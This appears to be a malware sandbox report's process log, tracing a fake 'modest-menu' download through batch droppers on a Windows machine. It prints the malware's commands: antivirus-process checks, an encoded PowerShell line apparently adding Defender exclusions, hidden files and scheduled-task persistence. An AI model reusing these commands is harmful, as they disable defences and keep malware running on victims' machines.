PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 2592 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 2592 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\redirect.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcad0dcc40,0x7ffcad0dcc4c,0x7ffcad0dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1764,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1984 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2368 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3084 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3728,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3196 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5176,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5188 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4552,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=988 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5196,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4240 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5284,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5452,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5484 /prefetch:1

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=1432,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1428 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3152,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5576 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5340,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4448,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3212,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4400 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5516,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3144 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5504,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5776 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5632,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5720 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5832,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5332 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5772,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3772 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5844,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2164 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5372,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5716 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5184,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5488,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3120,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4488 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3224 /prefetch:8

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6264,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6580,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=6564 /prefetch:1

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe"

C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe

"C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\modest8\Read.txt

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p2201249071693326612168609430 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAEcAbQBxAFIAZQBwAGMASwBNAEQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAEQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBaAEcAMwA3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFIAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAEcAbQBxAFIAZQBwAGMASwBNAEQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAEQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBaAEcAMwA3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFIAQwAjAD4A"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk2882" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk2882" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

